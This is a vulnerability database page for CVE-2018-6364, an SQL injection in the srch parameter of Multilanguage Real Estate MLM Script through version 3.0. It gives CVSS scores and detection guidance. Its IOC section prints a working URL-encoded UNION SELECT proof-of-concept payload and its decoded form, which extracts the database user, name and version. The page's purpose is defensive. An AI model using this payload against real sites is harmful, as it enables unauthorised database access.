cbcvebase.
CVE-2018-6364
published 2018-01-29

CVE-2018-6364: SQL Injection exists in Multilanguage Real Estate MLM Script through 3.0 via the /product-list.php srch parameter.

PriorityP261critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
3.11%
86.1th percentile
SQL Injection exists in Multilanguage Real Estate MLM Script through 3.0 via the /product-list.php srch parameter.

Affected

1 ranges
VendorProductVersion rangeFixed in
multilanguage_real_estate_mlm_script_projectmultilanguage_real_estate_mlm_script<= 3.0

Detection & IOCsextracted from sources · hover to see the quote

urlhttp://localhost/[PATH]/product-list.php?srch=[SQL]
command%73%66%64%27%29%20%20%2f%2a%21%30%38%38%38%38%55%4e%49%4f%4e%2a%2f%28%2f%2a%21%30%38%38%38%38%53%45%4c%45%43%54%2a%2f%20%28%31%29%2c%28%32%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%34%29%29%2d%2d%20%2d
path/product-list.php
  • Monitor HTTP requests to /product-list.php for SQL injection patterns in the 'srch' GET parameter, particularly URL-encoded payloads containing UNION SELECT sequences (e.g., %55%4e%49%4f%4e, %53%45%4c%45%43%54) or inline comment obfuscation (/*!08888...*/)
  • The PoC payload decodes to: sfd') /*!08888UNION*/(/*!08888SELECT*/ (1),(2),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(4))-- - — detect attempts to exfiltrate USER(), DATABASE(), and VERSION() via CONCAT_WS in the srch parameter
  • ·The exploit was tested against version <= 3.0 of Multilanguage Real Estate MLM Script; the CVE scope covers 'through 3.0', so detections should be scoped to installations running this version or earlier.

CVSS provenance

nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.